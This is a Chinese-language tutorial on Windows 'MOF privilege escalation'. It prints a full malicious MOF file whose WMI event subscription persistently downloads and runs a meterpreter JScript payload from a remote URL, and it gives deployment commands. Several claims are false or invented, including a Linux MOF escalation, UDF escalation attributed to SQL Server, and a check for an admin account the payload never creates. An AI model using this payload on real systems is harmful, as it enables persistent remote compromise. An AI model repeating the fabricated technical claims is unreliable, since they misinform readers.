Mof提權攻擊詳解

一、Mof提權程序全稱

Mof是一種特殊的WMI（Windows Management Instrumentation）格式，可以被用於執行特定的操作，例如創建永久性的後門、隱藏文件和執行命令等。Mof提權程序是利用Mof文件格式以及WMI服務漏洞實現的一種Windows系統提權攻擊。

攻擊者可以通過Mof文件將惡意代碼寫入系統中，然後利用WMI服務解析Mof文件並執行其中的代碼，最終實現對系統進行提權操作。一旦攻擊成功，攻擊者就可以獲得系統管理員許可權，從而完全控制受害計算機。

二、UDF提權

除了Mof提權外，另一種常見的Windows系統提權攻擊技術是UDF（User Defined Functions）提權。UDF提權攻擊是利用一種特殊的SQL Server User Defined Function函數漏洞，通過創建惡意函數並執行，最終獲得SYSTEM管理員許可權。

與Mof提權不同的是，UDF提權使用的是SQL Server資料庫服務中的特定漏洞，而不是WMI服務的漏洞。因此，它只能在安裝了SQL Server的Windows系統上實現提權攻擊。

三、Mof提權步驟

1、編寫惡意Mof文件

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $Filter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP1";
    QueryLanguage  = "WQL";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_LocalTime\" AND TargetInstance.Second = 59";
};
instance of ActiveScriptEventConsumer as $Cons
{
    ScriptingEngine    = "JScript";
    ScriptText  = "GetObject(\"script:https://raw.githubusercontent.com/xxx/xxx/master/meterpreter/jscript/meterpreter.js\").run()";
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Cons;
    Filter = $Filter;
};

以上是一個基本的Mof文件編寫方法，在布控的時候，代碼被例行檢查和但會全部過關。

2、布控Mof文件

將Mof文件放置在指定目錄下，如下所示：

C:\Windows\System32\wbem\mof\evil.mof

然後打開命令提示符，在管理員許可權下輸入以下命令來下載該Mof文件以及更新WMI類定義：

mofcomp evil.mof

3、驗證攻擊是否成功

當攻擊者成功執行上述步驟後，可以通過以下命令來檢查攻擊是否成功：

net localgroup administrators

如果攻擊成功，會發現攻擊者被添加到系統管理員組中。

四、Mof提權 Linux

除了可以在Windows系統上實現Mof提權攻擊外，攻擊者還可以在Linux系統上利用Mof文件格式漏洞實現提權攻擊。

類似於Windows系統，攻擊者需要編寫惡意Mof文件，並將其放置在Linux系統的特定目錄下。然後，攻擊者需要執行以下命令將Mof文件編譯成二進位文件：

sudo mofcomp evil.mof -o /dev/null

此後，攻擊者就可以利用提權後的許可權執行任意命令和操作了。

總結

通過以上分析可以看出，Mof提權攻擊利用了WMI服務漏洞，攻擊者可以編寫惡意的Mof文件，將其放置在Windows系統的特定目錄下，然後利用WMI服務解析執行其中的惡意代碼，最終實現對系統的提權操作。防範Mof提權攻擊的最好方法是及時升級並維護系統。